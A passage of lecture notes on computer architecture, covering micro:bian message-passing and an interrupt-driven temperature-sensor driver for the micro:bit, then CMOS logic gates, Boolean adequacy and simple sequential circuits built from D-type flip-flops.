The function gets the destination in the form of a process number: the process table is entirely private to the scheduler, and pointers to process records are never passed to the client program. The implementation of send begins by finding the process id src of the current process, which is sending the message, and also for brevity a pointer pdest to the process record for the destination.

What happens next depends on whether the destination process is waiting to receive a message with this type.

    if (accept(pdest, type)) {
        /* Receiver is waiting: deliver the message and run receiver */
        deliver(pdest->message, src, type, msg);
        make_ready(pdest);
        make_ready(os_current);
    } 

If so, then we can immediately copy across the message and fill in src as the sender field and type as the type field of the message: this is done by deliver(), which takes into account the possibility that pdest->message or msg or both may be NULL. Filling in the sender automatically is a matter of convenience for us, but in Minix it is part of the security system, ensuring against forgery. Finally we call make_ready() on both the destination and the current (source) processes to add them to a queue, each according to its priority. This is the simplest way of ensuring that the next process is chosen in a way that satisfies the scheduling policy – but note that the destination goes on the queue first, since it is the process most likely to have real work to do.

    else {
        /* Sender must wait by joining the receiver's queue */
        set_state(os_current, SENDING, type, msg);
        enqueue(pdest);
    }

If the destination is not waiting for the sender's message, then the sender must block until the destination can accept the message. We record the message type and the address of the message buffer as part of the sender's state, set its status to SENDING, and add the sender to the queue of processes associated with the receiver.

    choose_proc();
}

Finally, whichever case applied, we need to choose a new process to run. If the message has been delivered, then it's more than likely the destination process will be chosen; otherwise the source is blocked, and another process must run, perhaps the destination, perhaps some other process.

Here's a simple version of mini_receive, which implements the receive system call. It first checks whether an INTERRUPT message is pending, then searches the queue of waiting senders to see if any of them have a message of the right type. If neither of these works, then the receiving process must block and wait for a sender or interrupt to appear.

/* mini_receive -- receive a message */
static void mini_receive(int type, message *msg)
{
    /* First see if an interrupt is pending */
    if (os_current->pending && (type == ANY || type == INTERRUPT)) {
        os_current->pending = 0;
        deliver(msg, HARDWARE, INTERRUPT, NULL);
        return;
    }

    /* Now see if a sender is waiting */
    if (type != INTERRUPT) {
        proc psrc = find_sender(os_current, type);

        if (psrc != NULL) {
            deliver(msg, psrc->pid, psrc->msgtype, psrc->message);
            make_ready(os_current);
            make_ready(psrc);
            choose_proc();
            return;
        }
    }

    /* No luck: we must wait. */
    set_state(os_current, RECEIVING, type, msg);
    choose_proc();
}    

(This version of receive doesn't take into account that a message might be sent with sendrec.)

In describing the process of sending and receiving messages, we've used various simple subroutines like accept (which tests if a message is acceptable), make_ready (which puts a process on the right ready queue), and enqueue (which puts the current process on the sneder queue of another process). All these subroutines are easy to implement using the representation of processes, including the linked lists formed by the waiting and next pointers – see the source code for details. There's no need to worry about the time taken by subroutine calls, because GCC is able to substitute the subroutine bodies inline.

As an example, here's an implementation of enqueue(pdest), which hangs the current process on the end of the queue pdest->waiting of processes waiting to send to process pdest.

/* enqueue -- add current process to a receiver's queue */
static inline void enqueue(proc pdest)
{
    os_current->next = NULL;
    if (pdest->waiting == NULL)
        pdest->waiting = os_current;
    else {
        proc r = pdest->waiting;
        while (r->next != NULL)
            r = r->next;
        r->next = os_current;
    }
}

We expect very few processes to be simulataneously trying to send to the same receiver, so it's appropriate to use the simplest possible implementation – a singly linked list. If the queue is empty, then the function adds the current process as its only element. If the queue isn't empty, then it searches for the last process in the queue and adds the current process after it.

Lecture 16

Lecture 16 – A device driver

Using documentaton to write a driver for a simple device. The Nordic chip on the microbit has a temperature sensor that measures the temperature of the processor die in units of 1/4° Celsius. The device consists of an analog circuit that exploits some temperature-dependent property of silicon, together with a dedicated A-to-D converter that digitises a reading. The A-to-D converter takes some time to settle, so there is a protocol where the processor initiates a reading, then must wait for an event that can be signalled by interrupt before getting the result. We will aim to write a device driver for the sensor, and provide a function

int temp_reading(void)

that can be called from any process to get an up-to-date temperature reading.

Reasons for having a separate device driver process:

  • We can manage concurrent access from multiple processes and prevent a new reading being initiated before the previous one is finished.
  • We can connect to the interrupt from the device and react when a reading is complete.

The hardware

Two pages from the nRF51822 manual describe the hardware of the temperature sensor. All the device registers are addressible at offsets from the base address TEMP = 0x4000C000.

  • There is an 'task' START = 0x000 that initiates a reading when triggered with TEMP_START = 1.
  • There is an 'event' DATARDY = 0x100 that indicates when the reading is ready (with TEMP_DATARDY == 1).
  • There is an interrupt enable register INTEN = 0x300 in which bit TEMP_INT_DATARDY = 0 enables the interrupt on the DATARDY event.
  • There is a data register TEMP = 0x508 that contains the value of the reading when ready.

Note: This syntax for device descriptions is obsolete.

We can describe this layout by adding suitable definitions to the header file hardware.h. Actually, kind Mike has already written them. We need to strain the rules of C to the limit to write this stuff – and I won't go into details, because most of the really hairy stuff is hidden in macros like _DEVICE and _REGISTER. What we need is the following (with unused registers elided):

/* Temperature sensor */
_DEVICE _temp {
/* Tasks */
    _REGISTER(unsigned START, 0x000);
/* Events */
    _REGISTER(unsigned DATARDY, 0x100);
/* Registers */
    _REGISTER(unsigned INTEN, 0x300);
    _REGISTER(unsigned VALUE, 0x508);
};

/* Interrupts */
#define TEMP_INT_DATARDY 0

#define TEMP (* (volatile _DEVICE _temp *) 0x4000c000)

Broadly speaking, this says that a _temp device has four registers at the offsets shown, all accessed as 4-byte unsigned integers. Then it says that a particular _temp device TEMP exists at the address 0x4000c000. This hardware address is linked behind the scenes with the irq TEMP_IRQ = 12, because of the c = 12 in 0x4000c000 – but that fact is not important.

The upshot of these definitions is that when we write (for example)

temp = TEMP_VALUE

in our program, that corresponds to fetching from the address 0x4000c508. If temp lives in r6, the equivalent machine code would be

ldr r0, =0x4000c508
ldr r6, [r0]

developing the address of the TEMP_VALUE register into r0, then loading from that address into r6.

Configuring the interrupt

There's nothing to set up about the temperature sensor itself: when triggered it always does its job in the same way, with no variation that we can control. But we do have to condifure the interrupt mechanism so that the completion of a reading results in an INTERRUPT message to our driver process. Here are the steps, following the flow from device to driver process.

  • First, we must tell the device to request an interrupt when a reading is ready. We do this by setting a bit (the only significant bit, as it happens) in the device's INTEN register.
TEMP_INTEN = BIT(TEMP_INT_VALRDY);
On other devices, there may be several potential causes of interrupts, and we can choose which causes will actually lead to an interrupt being requested.
  • Second, we must tell the interrupt controller to pass on interrupt requests from the device. There's a register NVIC_ISER that has one bit for each of the 32 different device interrupts, and setting the appropriate bit in that register makes the NVIC pass through the corresponding interrupt. So we write
enable_irq(TEMP_IRQ);

as an abbreviation for

NVIC_ICER = BIT(12);
This enables the appropriate interrupt. A detail: storing a 1 bit in NVIC_ISER enables the corresponding interrupt without disabling any others; to disable a specific interrupt, we store an appropriate 1 bit into its sister register NVIC_ICER. This pattern is found all over the place – in fact, the temperature device has two registers INTENSET and INTENCLR alongside the INTEN register that also have this behaviour, even in the futile case where they contain only one significant bit.
  • We might need make sure that the processor is accepting interrupts, something that can be done with the call
intr_enable(); // (not needed)
which is an abbreviation for a special instruction that is written cpsie i in assembly language. But the processor starts up in a mode where interrupts are enabled, so we don't need to do anything specific for this device.

What we've had so far sets up the hardware so that interrupts will happen at an appropriate time. Under micro:bian, the interrupts will be handled by the general interrupt handler that looks up the interrupt in a table and send a message to the appropriate driver process.

  • So (third) we must register our process for the relevant interrupt with the system call
connect(TEMP_IRQ);
This fills in the PID of the current process in the os_handler table, and also raises the priority of the current process so that interrupts will be delivered promptly.

A cautious programmer might choose to put the call to connect() before the call to enable_irq(), so that any interrupt that was already pending will be delivered and not cause a panic. Then the device driver would have to be written so as to ignore spurious interrupts. In this case, it seems that the temperature sensor won't request an interrupt before it is started, so everything is safe.

We end up with the code

TEMP_INTEN = BIT(TEMP_INT_DATARDY);
connect(TEMP_IRQ);
enable_irq(TEMP_IRQ);

to include at the top of the device driver. The hardware setup could be put elsewhere, but the call to connect must come from the device driver process, because that's how the OS identifies which process wants to connect.

The driver process

Note: Update needed for changed micro:bian API.

Because we will deal with each request – starting the reading, waiting for it to be ready, then retrieving the value – before accepting another request, we can write the driver process in a particularly simple way, where the server loop deals with one complete request for each iteration, and a call receive(INTERRUPT, ...) in the body of the loop pauses until the hardware produces a reading.

static void temp_task(int arg)
{
    message m;
    int temp, client;

    ... setup as above ...

    while (1) {
        receive(ANY, &m);

        switch (m.type) {
        case REQUEST:
            client = m.sender;

            TEMP_START = 1;
            receive(INTERRUPT, NULL);
            assert(TEMP_DATARDY);
            temp = TEMP_VALUE;
            TEMP_DATARDY = 0;
            clear_pending(TEMP_IRQ);
            enable_irq(TEMP_IRQ);

            m.int1 = temp;
            send(client, REPLY, &m);
            break;

        default:
            badmesg(m.type);
        }
    }
}

There are a couple of layers to explain here: first, there's a server loop that accepts a request, carries it out, sends a reply, then loops around to accept another request. If we're content to complete the handling of one request before accepting another one, then this is sufficient, and we don't have to deal with interrupts in the main server loop.

After receiving a request, the process notes which process sent the request, so it can reply to the same process later. There follows a bit of code that uses the sensor hardware to get a temperature reading, then the process constructs a REPLY message with the reading in its int1 field, and sends that message back to the client. The relationship between client and server looks like a function call here: the client sends in a request, waits while the server does the work, then receives a reply before carrying on. This pattern of interaction is often called remote procedure call.

The code for carrying out a request is not hard to understand. First, we start the sensor taking a reading.

TEMP_START = 1;

Nothing more happens until the reading is done, and then we receive an interrupt message, so we can safely wait for the message to arrive.

receive(INTERRUPT, NULL);

(Note that we insist on an INTERRUPT message, so we don't accidentally receive another request at this point. Any client processes wanting to request a reading must wait, and they wait on the queue of processes that want to send to this one, with no explicit queue in our program needed. Also note that we can specify the second parameter of receive() as NULL if we are not interested in any data about the message received.)

When the interrupt arrives, we expect it is because the conversion is complete, so we write

assert(TEMP_VALRDY);

If the VALRDY event hasn't been signalled, then something has gone horribly wrong, and the failed assertion will result in the Seven Stars of Death.

At this point, the reading is available in the VALUE register of the device, so we fetch it and keep it in the local variable temp. (This is one of the few times a variable called temp is a good idea!).

temp = TEMP_VALUE;

Following that, we must reset the hardware ready for the next reading, and that mostly means re-arming the interrupt mechanism. That must be done in a specific order if we aren't going to trigger another interrupt by accident. First, let's remove the cause of the interrupt by resetting the DATARDY event.

TEMP_DATARDY = 0;

Second, because of the way the NVIC interacts with micro:bian's interrupt mechanism, we must clear the pending bit for the interrupt.

clear_pending(TEMP_IRQ);

That amounts to storing a 1 bit in the appropriate place in a special register NVIC_ICPR: details in hardware.h. Finally, it's safe to enable the interrupt request again.

enable_irq(TEMP_IRQ);

And now the reading is in the variable temp, and the interrupt hardware is set up for the next reading.

Client stub

Note: Update needed for changed micro:bian API.

Clients will obtain temperature readings by sending a message to the server and waiting for a reply that contains the reading. It's convenient to provide a little function function temp_reading() that carries out this interaction for the client and returns the reading as its result. For the remote procedure call idiom of sending a request and waiting for the reply, we can use the sendrec system call.

int temp_reading(void)
{
    message m;
    sendrec(TEMP_TASK, REQUEST, &m);
    return m.int1;
}

Why use sendrec() here? There are three reasons: in order of increasing importance, (i) it is shorter than writing two separate calls; (ii) it is more efficient, because after the client process sends a request and suspends, the client does not need to run again before being ready to receive the reply; and (iii) using sendrec() avoids a situation called priority inversion, where a high-priority process with work to do is blocked because another, lower-priority, process needs to run first.

sendrec() and priority inversion

With separate send() and receive(), the sequence of events will be as follows.

  1. The client process calls send() and (we assume) immediately rendezvous with the receive() call at the top of the server loop.
  2. Because the server process has higher priority than the client process, the client process is suspended on the ready queue and the server process starts to run.
  3. The server process perform a temperature reading. Let's assume that during this time, other processes run and the client (despite being active) does not.
  4. The server calls send() to return a reply to the client. At this point, if the client had used sendrec(), the kernel would know that the client was waiting to receive a reply, the message could be transferred immediately, and the server (with its higher priority) could continue to run.
  5. If the client has not uses sendrec(), then the server blocks at its call the send() for the reply, and must wait until the client process is scheduled again; at that point, the message is transferred and both server and client are made active. Because the server process has higher priority, it is selected to run again.

The upshot is that, unless sendrec() is used, there is are least two additional context switches between server and client, and a situation could arise where the server was needlessly blocked for a while, waiting the a lower-priority process to be scheduled. This priority inversion does no harm in this example, because once the temperature reading is delivered, the server process has nothing more to do before waiting for the next request, but in examples where events can happen continuously, it can create a problem.

There is no way of avoiding the problem by writing the client program in a different way, unless the calls to send() and receive() are combined. When the client program is suspended, that happens inside the system call stub for send(); on being resumed, the process will return from the send() stub, prepare the arguments, and immediately call the receive() stub and enter the operating system again. Using sendrec() instead of send() followed by receive() short-circuits this sequence of events; having sent its message, the client immediately enters the RECEIVING state to wait for the reply, without having to run again first.

To implement sendrec(), we need to add another process state, SENDREC, in case the client process must wait for the server process to be ready to receive; the difference between SENDREC and SENDING is that when it has sent its message, a process in state SENDING enters the ACTIVE state, and a process in state SENDREC enters state RECEIVING, always blocking until the server sends a reply. The implementation of receive() must change to reflect this distinction.

One rule restricts the use of sendrec(), but not in a way that affects its usage in practice: the sendrec() system call cannot be used to send a REPLY message. Allowing this could lead to a situation where a chain of processes are waiting, each wanting to use SENDREC to send a reply to the process to its right, but blocked from doing so because that process is itself waiting to send. When the process at the far right end of the chain eventually accepts a message, the whole chain would have to unravel at once, and that would complicate the implementation without making micro:bian any more useful.

A client program

Using the timer service, it's quite easy to write a client program that requests readings from the server at (say) 1 second intervals and prints them. Without floating point arithmetic, we have to be a bit sneaky about how we print the readings.

static const char *decimal[] = {
    "00", "25", "50", "75"
};

void main_task(int n)
{
    int t = 0, temp;

    while (1) {
        temp = temp_reading();
        /* Assume temp >= 0 */
        printf("%d: Temp = %d.%sC\n", t++, temp>>2, decimal[temp&0x3]);
        timer_delay(1000);
    }
}

The init() function must start the device driver and the main process, as well as the drivers for the timer and the serial port.

void init(void)
{
    serial_init();
    timer_init();
    TEMP_TASK = start("Temp", temp_task, 0, 256);
    start("Main", main_task, 0, STACK);
}

Lecture 17 – Introduction

Plan for the term. Combinational logic.

Our aim this term will be to show one way in which it is possible to build from transistors a computer capable of executing the kind of machine-language programs we wrote last term. It's important to realise that we will study only one way of doing each task, and that way will often not be the best.

  • We will use transistors to build logic gates.
    • We will stick to a design principle called CMOS, where each gate has two complementary networks of transistors, one to drive the output high when necessary, and the other to drive it low the rest of the time. We ignore clever implementations of some logic gates that use fewer transistors but do not follow this pattern.
  • We will use logic gates and latches (also built from transistors) to design functional units, including decoders, multiplexers, registers, and adders.
    • We will observe that a small selection of gate types is sufficient to implement any Boolean function, but we won't concern ourselves with methods for designing the smallest circuit that implements a specified function.
    • Likewise, after observing that logic-plus-latches is sufficient to implement any finite state machine, we won't be concerned with the routines and rituals needed to design optimal implementations of specified machines, but will be content to live on our wits a bit in designing the circuit elements we need.
    • Though we will show that each functional unit can be built from gates and latches, we'll largely ignore other implementations that are smaller and faster. For example, there is an implementation of ROMs that uses only one diode (or one transistor) per bit, and we mention it only in passing.
  • We will use functional units to design a simple 'single-cycle' implementation of a Thumb subset.
    • Because each instruction is executed in a single clock cycle, we won't attempt to implement those instructions, such as multi-register push and pop, that clearly require more than one cycle of activity.
    • And because the whole of the execution of an instruction happens within a clock cycle, the implication will be that a clock cycle for our design will be rather long, so the clock frequency will have to be low. More practical designs would overlap the execution of one instruction with fetching and decoding the next one, in a scheme called pipelining. We will not have time to go into that.

Logic gates

A combinational circuit has inputs and outputs that are Boolean values, drawn from {0, 1} = {false, true}; the outputs depend only on the current values of the inputs. (Contrast this with sequential circuits, where the outputs also depend on inputs in the past, and clairvoyant circuits, where the outputs depend on inputs that will arrive in the future.) In electronic logic, we represent 0 with a voltage close to ground, and 1 with a voltage close to the positive supply rail.

A logic gate is a combinational element that computes a single (simple) function of its inputs.

Gate symbols

For example, an AND gate has z = ab: the behaviour can be spelled out with a truth table, giving the output for each possible combination of inputs.

AND
a b z
0 0 0
0 1 0
1 0 0
1 1 1

As we'll see later, logic gates like this are simple enough that we can implement them with a handfull of transistors. We can connect gates together to compute more elaborate functions. For example, consider this assembly of AND gates:

A tree of AND gates

We can deduce the behaviour of this circuit by drawing up a truth table, listing the 16 possibilities for the four inputs, and for each of them showing the intermediate signals x and y and the output z.

a b c d x y z
0 0 0 0 0 0 0
0 0 0 1 0 0 0
0 0 1 0 0 0 0
0 0 1 1 0 1 0
0 1 0 0 0 0 0
0 1 0 1 0 0 0
0 1 1 0 0 0 0
0 1 1 1 0 1 0
1 0 0 0 0 0 0
1 0 0 1 0 0 0
1 0 1 0 0 0 0
1 0 1 1 0 1 0
1 1 0 0 1 0 0
1 1 0 1 1 0 0
1 1 1 0 1 0 0
1 1 1 1 1 1 1

It's only if all four inputs are 1 that the output is 1: we have made 4-input AND gate from three 2-input gates. The behaviour of any acyclic assembly of gates can be deduced in a similar way.

Propagation delay

What about this circuit?

A cascade of AND gates

We can check – by reasoning or another truth table – that it also functions as a 4-input AND gate. But it performs less well. After the inputs of a gate become stable, it takes some time before the output also takes on a stable value. These delays add up along paths through the circuit, and it is the longest path that matters in determining the overall delay. So we prefer circuits with a small depth, so that all the paths are short.

Other gates

AND gates on their own can't do much, but there are other types we can use. Also shown in the picture above are an OR gate, z = ab, with this truth table:

OR
a b z
0 0 0
0 1 1
1 0 1
1 1 1

An inverter (NOT gate) outputs the opposite of its single input, z = ¬a, with the truth table:

NOT
a z
0 1
1 0

We can connect such gates together in any acyclic arrangement we choose, and each such circuit computes a Boolean function that we can also express as an algebraic formula in terms of the inputs. For example, this circuit computes the function

z = ~((ab) ∨ c).
An AND-OR-NOT circuit

As a truth table,

a b c d e z
0 0 0 0 0 1
0 0 1 0 1 0
0 1 0 0 0 1
0 1 1 0 1 0
1 0 0 0 0 1
1 0 1 0 1 0
1 1 0 1 1 0
1 1 1 1 1 0

Adequacy

It turns out that AND, OR and NOT are sufficient to implement any Boolean function. I will demonstrate this with an example, and provide a separate note with a general proof – perhaps better digested after you have made some progress in Formal Proof. So let's take f(a, b, c) to be this 'majority' function (which we will find a use for later in the course):

MAJ
a b c f
0 0 0 0
0 0 1 0
0 1 0 0
0 1 1 1
1 0 0 0
1 0 1 1
1 1 0 1
1 1 1 1

There are four lines in the truth table where the function takes value 1, and we can write a 'product term' for each of these lines that is true on that line and false everywhere else.

  • p = ¬abc
  • q = a ∧ ¬bc
  • r = ab ∧ ¬c
  • s = abc.
a b c p q r s f
0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0
0 1 0 0 0 0 0 0
0 1 1 1 0 0 0 1
1 0 0 0 0 0 0 0
1 0 1 0 1 0 0 1
1 1 0 0 0 1 0 1
1 1 1 0 0 0 1 1


We can get a formula for f by taking the disjunction (sum) of these four terms.

f = (¬abc) ∨ (a ∧ ¬bc) ∨ (ab ∧ ¬c) ∨ (abc).

That formula agrees with f on every line of the truth table: on lines where f is 1, exactly one of the terms is true – namely the term that was written for that line, so when we OR all the terms together, we get 1. On lines in f's truth table where f is false, all of the terms are false, so ORing them together also gives false.

It should be evident that we could go through a similar procedure for any desired function f, writing a Boolean formula that agrees with f for all inputs. Given such a formula, we can draw a circuit containing AND, OR and NOT gates in a routine way, such as this circuit for the majority function, using four 3-input AND gates and a 4-input OR gate:

Majority circuit 1

This procedure gives a circuit that implements any desired Boolean function, but often there is a simpler, equivalent formula, leading to a simpler circuit. In that case of the majority function, we find

f = (ab) ∨ (ac) ∨ (bc).

To verify that this formula is also correct, we can make a truth table for it, observing that each of the three terms is true only if f is true also, and that together they cover all the situations in which f is true. Alternatively, we can simplify the original expression algebraically to get the same result.

f = (¬abc) ∨ (abc)
  ∨ (a ∧ ¬bc) ∨ (abc)
  ∨ (ab ∧ ¬c) ∨ (abc)
 = ((¬aa) ∧ bc)
  ∨ (a ∧ (¬b ∨ b) ∧ c)
  ∨ (ab ∧ (¬cc))
 = (bc) ∨ (ac) ∨ (ab)

There are routine, manual procedures that take a Boolean function with a small number of variables and find its minimal expression as a 'sum of products', but we don't have time to study them in this course. Such procedures are hard to use if there are more than 4 inputs to the circuit, and are in any case rendered irrelevant by computer methods that you can study in the course Computer-Aided Formal Verification. Comforting though rituals are, in this course it will be enough for us to rely on insight, enthusiasm and good luck.

Added in the lecture

1. Multiplexer: a combinational circuit implementing z = (¬c ? a : b) by

z = (¬c ∧ a) ∨ (cb)

2. Input combinations as vertices of a (hyper)cube with terms as edges or faces. Finding a covering set of prime implicants for the majority example using the cube, and using a Karnaugh map. (Not examinable.)

Lecture 18 – Transistors and logic gates

Building gates from transistors. CMOS logic.

As a growing competitor to the tube amplifier comes now the Bell Laboratories’ transistor, a three-electrode germanium crystal of amazing amplification power, of wheat-grain size and low cost. Yet its frequency limitations, a few hundred kilocycles, and its strict power limitations will never permit its general replacement of the [vacuum tube] amplifier. – Lee de Forest, inventor of the thermionic valve, 1952

Transistors and logic gates

There are various circuit symbols for an n-type MOSFET – or in full, and n-channel enhancement mode metal-oxide-silicon field effect transistor.

N-type transistors

We will generally use the simplest symbol, the one at the left. As the symbol suggests, the transistor consists of a piece of silicon (the channel) with terminals (the source and the drain) at the two ends, and separate connection to the gate, which is electrically isolated from the channel. Connecting the gate to a positive voltage with respect the the channel allows electrons to enter the channel at the source and to leave at the drain, so that a current flows in the transistor.

A simple model for the behaviour of such a transistor is that if the gate is connected to the positive power supply terminal (Vdd, typically +3.3V), the source and drain are connected together, but if it is connected to ground (0V), then they are not connected. We'll avoid situations where the gate is not connected to one of these two voltages.

We will also use another kind of transistor, the p-type.

P-type transistors

The symbol with the little circle is not greatly liked by electronic engineers, but it's the one we shall use. The behavioural model we will adopt for the p-type is that if its gate is connected to ground, then the transistor conducts, and if it is connected to Vdd then it does not conduct.

We will (nearly) always design circuits in a style called CMOS (for complementary MOS) that contain equal numbers of n-type and p-type transistors. The simplest useful circuit is an inverter.

Inverter

This circuit has one input at a and one output at z. If a is connected to ground, then the n-type transistor does not conduct, but the p-type does: this connects the output z to Vdd. On the other hand, if a is connected to Vdd, then it is the n-type transistor that conducts, connecting z to ground. We can make a truth table that summarises the behaviour of the circuit.

a z
0 1
1 0

It's worth noticing that in a steady state, only one of the transistors is conducting, so no quiescent current is drawn from the supply. Also, the gates of the transistors are electrically insulated from the supply, so no current is drawn from the input a in a steady state. Current does flow during transistions, because there is some capacitance between the gate and channel that must be charged or discharged when the gate voltage changes, and for a brief period both transistors will be partially turned on, allowing current to flow through them. Facts like this lead to the observation that the power dissipation of a CMOS logic circuit is proportional to the rate of state transitions.

Another important observation is that if the input a is not actually at the rails, but close to them, then that will be enough to fully turn off one transistor and fully turn on the other, and the output will be very close to the opposite rail. Despite the fact that a negligible current is drawn at the input, substantial current is available at the output. It is this amplifying behaviour of logic gates that lets us build large, complex assemblies of gates with many stages and have the whole thing behave in a digital way.

We can't do much with just an inverter! So let's next look at this design for a NAND gate.

NAND gate

In this circuit (as you see) there are two n-type transistors in series connecting the output z to ground, and two p-types in parallel connecting it to Vdd. Each input of the circuit, a or b, is connected to one of the n-types and one of the p types. We can analyse the behaviour of this circuit case by case, but the upshot is that if one or both of the inputs are grounded, then one or both of the p-types will conduct, driving the output high; and in these cases the two n-types are never both conducting, so there is no path from the output to ground. On the other hand, of both inputs are high, the two n-types both conduct, driving the output low, but the p-types do not conduct and the output is disconnected from Vdd. We call the function NAND, because the output is low only if both a and b are high. Here's the truth table:

a b z
0 0 1
0 1 1
1 0 1
1 1 0

The NAND gate seems a curious choice for our first useful gate, but it is actually a natural one, because it is simple, and because it shares with all simple CMOS gates the property of being anti-monotonic: as inputs change from 0 to 1, that can only make more of the n-type transistors in the bottom half of the gate conduct, and fewer of the p-types in the top half; and that can only cause the output, if it changes at all, to change from 1 to 0.

To get an AND gate, where the output is 1 exactly if both inputs are 1, we can follow the NAND gate with an inverter.

AND gate

CMOS gates in general

In general, a single CMOS gate has a network of n-type transistors connected between the output and ground, and a network of p-type transistors connected between the output and Vdd. Wherever n type transistors are connected in parallel, the corresponding p-type transistors are connected in series, and vice versa. For example, here is a design for an AND-OR-NOT gate:

AND-OR-NOT gate

In this circuit, the output z is connected to ground if either both a and b are high, or c is high (regardless of a and b). And z is connected to Vdd if both either a or b is low, and c is also low. In short,

z = ~((ab) ∨ c) = (~a ∨ ~b) ∧ ~c.

As a truth table,

a b c z
0 0 0 1
0 0 1 0
0 1 0 1
0 1 1 0
1 0 0 1
1 0 1 0
1 1 0 0
1 1 1 0

Complex gates like this are sometimes an efficient way of computing a Boolean function, but just NAND gates are enough to compute any function we might need. We can take any circuit in sum-of-products form (like either form of the majority function) and replace both the inner conjunctions and the outer disjunction with NAND gates. So for the more compact formula

f = (ab) ∨ (ac) ∨ (bc)

we obtain

f = NAND(NAND(a, b), NAND(a, c), NAND(b, c)).

This works essentially because of De Morgan's law, ¬(xy) = ¬ x ∨ ¬ y. Here is the corresponding circuit, consisting of just NAND gates:

Majority circuit 2

Questions

In the lectures, you used only p-type transistors in the upper part of a CMOS gate and the corresponding n-type transistors in the lower part. Can we mix them up in order to make a circuit that implements (a ∨ ¬b) ?

No, the rule for simple gates is that there is a pull-down network consisting of only n-type transistors, and a complementary pull-up network consisting of only p-types, with the gate of each transistor connected to an input of the gate. Consequently, the gate's function is anti-monotonic, and a ∨ ¬b cannot be implemented by a single gate. The best we can do is NANDa, b), which requires a NAND gate and an inverter. In a complex circuit, it's highly likely that ¬a would already be available, so the function would actually require only a single gate to be added.

It's reasonable to ask what would be a 'non-simple' gate, and there the added elements are pass-transistors, pairs of transistors containing an n-type and a p-type that either pass or block a signal. They don't help with implementing a ∨ ¬b, but if there's time I will mention them. There's a nice non-restoring implementation of XOR that uses two pairs of pass transistors and has a lower transistor count than the other implementations we've seen.

Lecture 19 – Sequential logic

Flip-flops. Designing sequential circuits.

Sequential circuits

In contrast to combinational circuits, sequential circuits have outputs that depend on the inputs from previous times in the history of the circuit. To construct such circuits, we must introduce a new element with 'memory': a (positive edge-triggered) D-type flip-flop.

D-type flip-flop

The flip-flop has two inputs, d and clk, and one or two outputs, one called q, and perhaps (for convenience) another equal to ¬q.

We will concentrate on fully synchronous designs where all the clock inputs of flip-flops are connected to a single, regular, global clock signal – perhaps derived from a quartz crystal. The little triangle in the circuit symbol means that the state of the flip-flop can change only when the clock signal makes a transition from 0 to 1 – a positive-going clock edge.

Because signals can now change over time, each wire will now carry a sequence of Boolean values ⟨a0, a1, a2, ...⟩. Combinational gates compute the same function in each clock period: for an AND gate, zt = atbt.

The D-type always produces as its output the value that its input had during the previous clock period

zt+1 = at.

We could spell out this behaviour in a kind of truth table, though it is a bit boring.

a zt zt+1
0 0 0
0 1 0
1 0 1
1 1 1

As you can see, the next state is always the same as the input, whatever the current state might be. (Other kinds of flip-flop exist where the next state depends on the current state as well as the input – they used to be popular with SSI logic, because they sometimes lead to simpler designs.)

We will assume the initial condition z0 = 0. Most flip-flops have an 'asynchronous reset' input that can be used to ensure this.

If you search for datasheets of SSI chips, you can find equivalent circuits for flip-flops in terms of gates: but you shouldn't take them too seriously, because the dynamic behaviour of a flip-flop over time cannot be deduced from the static behaviour of a collection of logic gates.

Example: parity detector

Before we look at the problem of specifying and designing sequential circuits, we should work out the behaviour of a given circuit.

Parity detector

In this circuit, the signals satisfy

xt = atzt
zt+1 = xt
z0 = 0

We can prove by induction on t that

zt = a0a1 ⊕ ... ⊕ at-1.

So the output is the parity of the input signals received so far.

Example: pulse shaper

Let's design a circuit that shapes an input signal into neat pulses, each lasting one clock cycle.

Timing diagram for pulse shaper

Note that

  • long input pulses become short output pulses, synchronised to the clock.
  • short pulses are lengthened to the clock period.
  • output pulses can occur on alternate clock cycles.
  • very short input pulses are ignored if they do not straddle a clock edge.

This circuit can be used to clean up the signal from a mechanical switch so as to remove contact bounce.

Some thought reveals that we can produce the output signal if we know the value of the input at the previous two clock edges. So if we arrange that always xt = at−1 and yt = at−2, then the output is given by

z = x ∧ ¬y

We can arrange for x and y to be the signals we want by arranging two D-types, one with D = a and Q = x, and another with D = x and Q = y.

Pulse shaper

We can think of the pulse shaper as a machine for running the following program, where the pause represents a delay until the next clock edge, and the two assignments y = x; x = a; happen simultaneously and instantaneously.

x = y = 0;
forever {
    z = x && !y;
    pause;
    y = x; x = a;
}

We could emphasise the simultaneous nature of the updates by extending C a bit (more) and writing a simultaneous assignment x, y = a, x; – a form that (e.g.) Python allows.

Clock speed

How fast can we make the clock? It all depends on the critical path – that is, the longest combinational delay in the circuit.

Critical path

Delays accumulate along each combinational path. In the diagram, time t1 is the propagation delay of the first flip-flop; times t2 and t3 are the propagation delays of the two gates, and time t4 is the setup time of the second flip-flop. For the circuit to work correctly we must set the clock period T so that T ≥ t1 + t2 + t3 + t4, and the same for all combinational paths.

Another timing calculation, involving contamination delays, is needed to put a bound on the amount of clock skew the circuit can tolerate.

Example: Bathroom light switch

Let's design a digital implementation of the kind of pull-cord light switch that is often found in British bathrooms. The first time you pull the cord, the light comes on. It stays on when you release the cord, but goes off when the cord is pulled for a second time. The switch has one input and one output: the output changes state just once for each pulse on the input, however long. In our digital circuit, the light will switch on the next clock edge following the change in input.

Timing diagram for bathroom light switch

It's tempting to think that this circuit has just two states – on and off – but that's not so. The arrows on the timing diagram mark two clock edges where the light is on and the input a is 1, but in one case the light stays on, and in the other it goes off. (If you've used a switch like this, you know there are two clunks – two changes of state – for each pull of the cord.)

We could try drawing a diagram of states, but we can also see that the following program does the right thing.

x = y = 0;
forever {
    z = y;

    pause;

    if (a)
        y = !x;
    else
        x = y;
}

Initially, x and y are both zero. When you pull the cord, y becomes one, but x stays at zero, and this remains true however long the cord is held. When the cord is released, x is set to one also, without any change in the output. Pulling the cord for a second time does just the same thing, but with the roles of 0 and 1 swapped.

Let's rewrite the loop body so that the state change becomes a single simultaneous assignment of the form

x, y = f(x, y, a), g(x, y, a);

since that is all that makes sense if we want to implement the program using fully synchronous hardware. The meaning of this assignment is that both f(x, y, a) and g(x, y, a) are evaluated, and the values are simultaneously assigned to x and y respectively. For this we need the fact that assigning the existing value of x to itself is the same as not assigning at all.

forever {
    z = y;
    pause;
    x, y = (a ? x : y), (a ? !x : y);
}

The conditional expressions (a ? x : y), meaning "if a then x otherwise y", can be implemented in hardware with multiplexers. For simplicity, we show two separate 1-bit multiplexers, though they could share some common circuitry.

Bathroom light switch

Questions

What is the semantics of your C-like hardware description language?

Semantics? You are taking it too seriously: it's just intended as a prompt to think about the behaviour of a sequential circuit as embodying a program.

